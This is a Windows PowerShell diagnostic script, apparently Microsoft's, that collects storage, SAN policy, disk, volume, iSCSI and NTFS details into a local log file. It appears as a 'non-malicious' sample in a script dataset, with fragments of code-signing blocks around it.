yW4YIpFPZP2x4FBMVCddseF2i+aMMjDHi0LcTQZxM2s3mFMrCZAWSfLYXYDIimFB # z8j0oLWGy3VgLmBTKM4xLqv7DZUz8B2SoAmbEtp62ngSl0hOoN73SFwE+Y24SvGQ # MWhykpG+vXDwcpWvwDe+TgnrLR7ATRFXN5JS26dm2yy6SYFMRYnME3dMHCQ/UQIQ # QNC8nLmIvdKkAoWEMXtJsGEo3QrM2S2SBv4PpHRzRukzTtP+UAceGxM9JyrwUQP5 # OCEmW6YchEyRDSwP4hU9f7B0Ayh14Pw9vJo7jewNjeMPIkmneyLSi0ruv2ox/xRG # tcJ9yBNC5BaRktjz7stPaojR+PDA2fuBtCo8xKlkt53mUb7AY+CZHHqhLm76pdMF # 6BHv2TvwlVBeQRN22XjaVVRwCgjgJnNewt7PejcrpUn0qHLgLq+1BN1DzYukWkTr # 7wT0zl0iXr+NtqUkWSOnWRfe8N21tB6uv3VkW8nFdChtbbZZz24peLtJEZuNrN8X # f9PTPMzZXDJBI1EciR/91QcGoZFmVbFVb2rUIAs01+ZkewvbhmGVDefX9oZG4/K4 # gGUsTvTW+r1JZMxUT2MwqQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM4b8Oz33hAq # BEfKlAZf0NKh4CIZMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCd1gK2Rd+eGL0e # Hi+iE6/qDY8sbbsO4emancp6KPN+xq5ZAatiBR4jmRRhm+9Vik0Fo0DLWi/N28bF # I7dXYw09p3vCipbjy4Eoifm0Nud7/4U30i9+7RvW7XOQ3rx37+U7vq9lk6yYpGCN # p0jlJ188/CuRPgqJnfq5EdeafH2AoG46hKWTeB7DuXasGt6spJOenGedSre34MWZ # qeTIQ0raOItZnFuGDy4+xoD1qRz2QW+u2gCHaG8AQjhYUM4uTi9t6kttj6c7Xamr # 2zrWuceDhz7sKLttLTJ7ws5YrA2I8cTlbMAf2KW0GVjKbYGd+LZGduEK7/7fs4GU # kMqc51FsNdG1n+zgc7zHu2oGGeCBg4s8ZR0ZFyx7jsgm9sSFCKQ5CsbAvlr/60Nd # k5TeMR8Js2kNUicu2CqZ03833TsvTgk7iD1KLgfS16HEvjN6m4VKJKgjJ7OJJzab # tS4JQgUnJrIZfyosk4D18rZni9pUwN03WgTmd10WTwiZOu4g8Un6iKcPMY/iFqTu # 4ntkzFUxBBpbFG6k1CINZmoirEWmCtG3lyZ2IddmjtIefTkIvGWb4Jxzz7l2m/E2 # kGOixDJHsahZVmwsoNvhy5ku/inU++dXHzw+hlvqTSFT89rIFVhcmsWPDJPNRSSp # MhoJ33V2Za/lkKcbkUM0SbQgS9qsdzCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjg5MDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQDuHayKTCaYsYxJh+oWTx6uVPFw+aCBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smiIDAi # GA8yMDI0MTAyODA1Mzk0NFoYDzIwMjQxMDI5MDUzOTQ0WjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDqyaIgAgEAMAcCAQACAikmMAcCAQACAhNdMAoCBQDqyvOgAgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAFmckdUeifZt8BprZ3zxv8eo/W1g # eDvTCg+AfBgsP5eubV4pW8eAaVQPjzjVseXEjtLErgpcesWIgWtwjTBdGPVhCatB # 3NRfg/awbJSa7tZm4sDycdvhoeYBZ3BqswvkYUxhhKUbAnZYYibg+H6YnGrog3UF # 4G0KdCndtoLOLZfqFPkLDzGpuEBwwuEfDjxgLz2GfRP0jeSHOA0d2f5CnwY3Tij2 # x/Thsl/+cvbZ4a/Eqb8pD8brFUdxFlOHbW3UMTLvz863JdgDarmdvyz/z5x1qIsW # wKHlydHqbGF6reb09z9dEdUNok4tjGHZW5O/uOd7Y340oWdSzkS012Nnz8UxggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe3h # X8vV96VdcwABAAAB7TANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCDT6MbOWOWALvC8nJO6/5kRKnYS # th+gvmlSLzyx6t4soDCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EII0uDWg0 # CFseKxK3A16l1wrIwrsSDrXZ6xSf0F4xbMo5MIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHt4V/L1felXXMAAQAAAe0wIgQgJHwmHNb0 # a877pzs9GGBhooAWbWExml1o498sDW/Bg5wwDQYJKoZIhvcNAQELBQAEggIATGrj # VCeUXbsJmM77oSvA9BHgwtcr522zVbJtv0SbxPwO98Sbg+NFdAB98iEIIQE7GlpO # BbzacBiuy6/varK7L0er31H67jOeF7KnA3ATX5V+XnAWySBkKK+wh9Bo4VqREi7j # es82ph9bJ6IxVxLMb9ab8e9twEdnzded23a+Gu5rXUM+X8ScVo3WrY/tHjrEDzhZ # dpl8R6fbzZ7HVL2mekaqy06D1L+6DAeV/3wC8Zl5Wzh1ok7fZQ4/URhHrTINsrzd # b/iajj4/T+/NTHdLeyeINyF3Ama5pJI1qVSSAQS0edhrHcDILUN/pN+GFLnhxuhn # jEkMXrrrJmz1JW8o4sKxvpj8q7LXwxlqrZ4ASI3IO//z0/OmDEas3W1GwsPdr/Gn # fjjycWi0rqOaqQT/Q631PReUSOfUNSe1cWLuN4P2ca5Ktl6yoIisARQsfE/cSzsh # Uw/65t0QzhAEXdmSta0PAP+ZgQ33bgz4d4pzkiKHC2OW9U3yIyRHWWwT32d05f0k # Tuf0VLieuNGfj6xm45KAtzZ5/N4X0Af1nyktsz/lO3t48b7A5hjZtMI8lbEp+neV # +JifvS9CBzVG4FPu88yjOXqxLoewX/NmD0ub//fK/EqBmR8eldk3tgK2KPfJSSm1 # Jdf5jSS+3OGvEEVzYOq1jjr4/U+EV1qio3Yq6Vk= # SIG # End signature block
combined_dataset/train/non-malicious/sample_15_4.ps1
sample_15_4.ps1
#region 'Old Code' <# if ($OSVersion.Major -eq 5) { # Disabling running on Win2K3 x64 due some reports of crashes for specific controllers "[San.exe] - Skipping running san.exe on Windows prior to Server 2008" | WriteTo-StdOut } else { Import-LocalizedData -BindingVariable SanStorageInfoStrings Write-DiagProgress -Activity $SanStorageInfoStrings.ID_SanDev -Status $DOSDevStrings.ID_SanDevRunning $fileDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutput $sectionDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutputDesc $OutputFile = $ComputerName + "_Storage_Information.txt" $CommandToExecute = "cmd.exe /c SAN.exe $CommandToAdd" RunCmD -commandToRun $CommandToExecute -sectionDescription $sectionDescription -filesToCollect $OutputFile -fileDescription $fileDescription } #> #endregion <# COLLECTING FOLLOWING INFORMATION: ---------------------------------------------- Important registry entries related to storage. Trim support Thin provisioning ODX support Device drivers and settings (if appropriate) DSM settings SCSI registry information SCSI inquiry information SCSI reservation information Tape Devices Tape Changers VDS information MPIO information Disk failure prediction information iSCSI connection information NTFS information #> Import-LocalizedData -BindingVariable SanStorageInfoStrings Write-DiagProgress -Activity $SanStorageInfoStrings.ID_SanDev -Status $DOSDevStrings.ID_SanDevRunning $fileDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutput $sectionDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutputDesc $OutputFile = ("{0}_StorageInfo.LOG" -f $env:COMPUTERNAME) $temp = (Get-CimInstance -Class Win32_OperatingSystem).Version.Split('.') [Float]$OSVersion = [Float]("$($temp[0]).$($temp[1])") if([Float]$OSVersion -lt [Float](6.0)) { # Skipping collecting storage info on Windows prior to Server 2008. return } # ============================================= # # Generic Info # ============================================= # "`n" | Out-File -FilePath $OutputFile -Append $os = Get-CimInstance Win32_OperatingSystem "{0, -17}: {1} (Build {2}) [{3}]" -f 'Operating System', ($os.Caption), ($os.BuildNumber), ($os.OSArchitecture) | Out-File -FilePath $OutputFile -Append "{0, -17}: {1}" -f 'Processor', ((Get-CimInstance Win32_Processor).Name) | Out-File -FilePath $OutputFile -Append "{0, -17}: {1}" -f 'Log Time', (Get-Date -Format 'HH:mm:ss yyyy/MM/dd') | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append # ============================================= # # VDS Alignment # ============================================= # $regKeyVDSAlignment = 'HKLM:\SYSTEM\ControlSet001\Services\vds\Alignment' if(Test-Path ($regKeyVDSAlignment)) { '=============================================' | Out-File -FilePath $OutputFile -Append 'VDS Alignment' | Out-File -FilePath $OutputFile -Append '=============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'INFO: Alignment Settings in Bytes' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'Between4_8GB', 'Between8_32GB', 'GreaterThan32GB', 'LessThan4GB' | ForEach-Object { "{0,-16}: {1}" -f $_, ((Get-ItemProperty -Path $regKeyVDSAlignment -Name $_ -ErrorAction SilentlyContinue)."$_") | Out-File -FilePath $OutputFile -Append } "`n" | Out-File -FilePath $OutputFile -Append } # ============================================= # # SAN Policy # ============================================= # Add-Type -TypeDefinition @" public enum SANPolicy { VDS_SP_UNKNOWN = 0x0, VDS_SP_ONLINE = 0x1, VDS_SP_OFFLINE_SHARED = 0x2, VDS_SP_OFFLINE = 0x3 } "@ $sanPolicyDescriptions = @{ 'VDS_SP_UNKNOWN' = 'The SAN policy is unknown.'; 'VDS_SP_ONLINE' = 'All newly discovered disks are brought online and made read-write.'; 'VDS_SP_OFFLINE_SHARED' = 'All newly discovered disks that do not reside on a shared bus are brought online and made read-write.'; 'VDS_SP_OFFLINE' = 'All newly discovered disks remain offline and read-only.'} [SANPolicy] $sanPolicy = 0 $regKeySanPolicy = 'HKLM:\SYSTEM\CurrentControlSet\Services\partmgr\Parameters' if(Test-Path ($regKeySanPolicy)) { $sanPolicyRegValue = (Get-ItemProperty -Path $regKeySanPolicy -Name 'SanPolicy' -ErrorAction SilentlyContinue).SanPolicy if($sanPolicyRegValue) { '=============================================' | Out-File -FilePath $OutputFile -Append 'SAN Policy' | Out-File -FilePath $OutputFile -Append '=============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append $sanPolicy = [Enum]::ToObject([SANPolicy], $sanPolicyRegValue) "{0} ({1}): {2}" -f $sanPolicy.value__, $sanPolicy, ($sanPolicyDescriptions.Get_Item("$sanPolicy")) | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'Refer: https://msdn.microsoft.com/en-us/library/bb525577.aspx' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append } } # ============================================= # # File System Settings # ============================================= # $regKeyFileSystem = 'HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem' if(Test-Path ($regKeyFileSystem)) { '=============================================' | Out-File -FilePath $OutputFile -Append 'File System Settings' | Out-File -FilePath $OutputFile -Append '=============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append # Trim/UnMap Support $regValueDisableDeleteNotification = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem -Name 'DisableDeleteNotification' -ErrorAction SilentlyContinue if($regValueDisableDeleteNotification) { "{0, -38}: {1} (Trim/UnMap {2})" -f 'DisableDeleteNotification', ($regValueDisableDeleteNotification.DisableDeleteNotification), ` (('Disabled','Enabled')[$regValueDisableDeleteNotification.DisableDeleteNotification -eq 0]) | Out-File -FilePath $OutputFile -Append } # ODX Support $regValueFilterSupportedFeaturesMode = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem -Name 'FilterSupportedFeaturesMode' -ErrorAction SilentlyContinue if($regValueDisableDeleteNotification) { "{0, -38}: {1} (ODX {2})" -f 'FilterSupportedFeaturesMode', ($regValueFilterSupportedFeaturesMode.FilterSupportedFeaturesMode), ` (('Disabled','Enabled')[$regValueFilterSupportedFeaturesMode.FilterSupportedFeaturesMode -eq 0]) | Out-File -FilePath $OutputFile -Append } "`n" | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'Other values from "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem"' | Out-File -FilePath $OutputFile -Append Get-ItemProperty $regKeyFileSystem -ErrorAction SilentlyContinue | Format-List -Property NtfsAllowExtendedCharacter8dot3Rename, NtfsBugcheckOnCorrupt, NtfsDisable8dot3NameCreation, ` NtfsDisableCompression, NtfsDisableEncryption, NtfsDisableLastAccessUpdate, NtfsDisableLfsDowngrade, NtfsDisableVolsnapHints, NtfsEncryptPagingFile, NtfsMemoryUsage, ` NtfsMftZoneReservation, NtfsQuotaNotifyRate, ScrubMode, SymlinkLocalToLocalEvaluation, SymlinkLocalToRemoteEvaluation, SymlinkRemoteToLocalEvaluation, SymlinkRemoteToRemoteEvaluation, ` UdfsCloseSessionOnEject, UdfsSoftwareDefectManagement, Win31FileSystem, Win95TruncatedExtensions | Out-File -FilePath $OutputFile -Append } # ============================================= # # Disk Failure Prediction # ============================================= # '=============================================' | Out-File -FilePath $OutputFile -Append 'Disk Failure Prediction' | Out-File -FilePath $OutputFile -Append '=============================================' | Out-File -FilePath $OutputFile -Append Get-CimInstance -Namespace Root\WMI -Class MSStorageDriver_FailurePredictStatus -ErrorAction Silentlycontinue | Select-Object InstanceName, PredictFailure, Reason, Active | Format-Table -Wrap -AutoSize -GroupBy PredictFailure | Out-File -FilePath $OutputFile -Append if([Float]$OSVersion -lt [Float](6.2)) { # ============================================= # # Disk Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Disk Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append $items = @('Name', 'Index', 'Status', 'StatusInfo', 'Access', 'Availability', 'BlockSize', 'Bootable', 'BootPartition', 'ConfigManagerErrorCode', 'ConfigManagerUserConfig', 'Description', 'DeviceID', 'DiskIndex', 'ErrorCleared', 'ErrorDescription', 'ErrorMethodology', 'HiddenSectors', 'InstallDate', 'LastErrorCode', 'NumberOfBlocks', 'PowerManagementCapabilities', 'PowerManagementSupported', 'PrimaryPartition', 'Purpose', 'RewritePartition', 'Size', 'StartingOffset', 'Type', 'Properties') Get-CimInstance Win32_DiskPartition | Format-List $items | Out-File -FilePath $OutputFile -Append # ============================================= # # Volume Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Volume Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append $items = @('AddMountPoint', 'Chkdsk', 'Defrag', 'DefragAnalysis', 'Dismount', 'Format', 'Mount', 'Reset', 'SetPowerState', 'Access', 'Automount', 'Availability', 'BlockSize', 'BootVolume', 'Capacity', 'Caption', 'Compressed', 'ConfigManagerErrorCode', 'ConfigManagerUserConfig', 'CreationClassName', 'Description', 'DeviceID', 'DirtyBitSet', 'DriveLetter', 'DriveType', 'ErrorCleared', 'ErrorDescription', 'ErrorMethodology', 'FileSystem', 'FreeSpace', 'IndexingEnabled', 'InstallDate', 'Label', 'LastErrorCode', 'MaximumFileNameLength', 'Name', 'NumberOfBlocks', 'PageFilePresent', 'PNPDeviceID', 'PowerManagementCapabilities', 'PowerManagementSupported', 'Purpose', 'QuotasEnabled', 'QuotasIncomplete', 'QuotasRebuilding', 'SerialNumber', 'Status', 'StatusInfo', 'SupportsDiskQuotas', 'SupportsFileBasedCompression', 'SystemCreationClassName', 'SystemVolume') Get-CimInstance Win32_Volume | Format-List $items -GroupBy DeviceID | Out-File -FilePath $OutputFile -Append # ============================================= # # iSCSI Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'iSCSI Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append $MSiSCSI = Get-Service -Name MSiSCSI -ErrorAction SilentlyContinue if($MSiSCSI) { "`n" | Out-File -FilePath $OutputFile -Append "{0} is {1}" -f $MSiSCSI.DisplayName, $MSiSCSI.Status | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append } } else { # ============================================= # # Disk Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Disk Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append Get-Disk -ErrorAction SilentlyContinue | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueIdFormat | Format-List -GroupBy BusType | Out-File -FilePath $OutputFile -Append # ============================================= # # Volume Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Volume Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append $volumes = Get-Volume -ErrorAction SilentlyContinue "Total Volume(s) : $($volumes.Count)" | Out-File -FilePath $OutputFile -Append $volumes | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId | Format-List -GroupBy DriveType | Out-File -FilePath $OutputFile -Append # ============================================= # # Partition Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Partition Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append $partitions = Get-Partition -ErrorAction SilentlyContinue "Total Partition(s) : $($partitions.Count)" | Out-File -FilePath $OutputFile -Append $partitions | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId | Format-List -GroupBy DiskNumber | Out-File -FilePath $OutputFile -Append # ============================================= # # iSCSI Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'iSCSI Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append $MSiSCSI = Get-Service -Name MSiSCSI -ErrorAction SilentlyContinue if($MSiSCSI) { "`n" | Out-File -FilePath $OutputFile -Append "{0} is {1}" -f $MSiSCSI.DisplayName, $MSiSCSI.Status | Out-File -FilePath $OutputFile -Append } if($MSiSCSI.Status -eq 'Running') { Get-IscsiTarget | Format-List | Out-File -FilePath $OutputFile -Append Get-IscsiTargetPortal | Format-List | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'Initiator Ports' | Out-File -FilePath $OutputFile -Append '---------------' | Out-File -FilePath $OutputFile -Append Get-InitiatorPort | Format-Table -AutoSize | Out-File -FilePath $OutputFile -Append } else { "`n" | Out-File -FilePath $OutputFile -Append } # ============================================= # # Storage Subsystem # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Storage Subsystem' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append Get-StorageSubsystem -ErrorAction SilentlyContinue | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId | Format-List | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append 'Storage Pool' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append Get-StoragePool | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId | Format-List | Out-File -FilePath $OutputFile -Append } # ============================================= # # Properties of Important Drivers # ============================================= # 'StorPort.sys', 'ScsiPort.sys', 'Classpnp.sys', 'Mountmgr.sys', 'VolSnap.sys', 'Ntfs.sys', 'PartMgr.sys', 'SpacePort.sys' | ForEach-Object { '==============================================' | Out-File -FilePath $OutputFile -Append "$_ Service Properties" | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append Get-ItemProperty -Path "$env:windir\System32\drivers\$_" -ErrorAction SilentlyContinue | Format-List -Property Name, Length, Mode, VersionInfo, LinkType, Target, CreationTime, LastWriteTime, LastAccessTime | Out-File -FilePath $OutputFile -Append} # ============================================= # # NTFS Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'NTFS Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append [System.IO.DriveInfo]::GetDrives() | Where-Object {$_.DriveFormat -eq 'NTFS'} | Select-Object Name | ForEach-Object { "Volume {0} `n`n" -f $_.Name | Out-File -FilePath $OutputFile -Append FSUTIL fsinfo ntfsInfo ($_.Name) | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append } "`n" | Out-File -FilePath $OutputFile -Append CollectFiles -filesToCollect $OutputFile -fileDescription $fileDescription -SectionDescription $sectionDescription # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCoZYf+QYWxL3dG # 7aRbdboIEI0dtSSHrEMio6I/snj6cKCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # 